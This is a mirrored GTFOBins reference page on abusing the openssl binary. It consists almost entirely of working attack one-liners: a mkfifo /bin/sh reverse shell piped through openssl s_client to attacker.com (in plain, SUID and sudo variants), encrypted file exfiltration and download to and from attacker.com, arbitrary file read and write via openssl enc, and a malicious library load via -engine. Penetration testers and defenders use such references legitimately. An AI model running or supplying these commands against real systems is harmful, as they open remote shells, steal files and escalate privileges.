GTFOBins.github.io/openssl.md at 2b5811bea6a14f7029e18e8da97d97bfae329a82 - GTFOBins.github.io - git.dotya.ml

mirror/ GTFOBins.github.io

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-19 01:59:37 +02:00

d0zer 041110d54d

Add library load section to OpenSSL

2020-04-12 11:20:11 +02:00

3.0 KiB

Raw Blame History

functions

reverse-shell

file-upload

file-download

file-write

file-read

suid

sudo

library-load

description	code
To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted.	RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 \| openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s

description	code
To collect the file run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save Send a local file via TCP. Transmission will be encrypted.	RHOST=attacker.com RPORT=12345 LFILE=file_to_send openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"

description	code
To send the file run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send Fetch a file from a TCP port, transmission will be encrypted.	RHOST=attacker.com RPORT=12345 LFILE=file_to_save openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"

code
LFILE=file_to_write echo DATA \| openssl enc -out "$LFILE"

code
LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF openssl enc -in "$TF" -out "$LFILE"

code
LFILE=file_to_read openssl enc -in "$LFILE"

description	code
To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted.	RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 \| ./openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s

code
LFILE=file_to_write echo DATA \| openssl enc -out "$LFILE"

description	code
To receive the shell run the following on the attacker box: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 Communication between attacker and target will be encrypted.	RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 \| sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s

code
openssl req -engine ./lib.so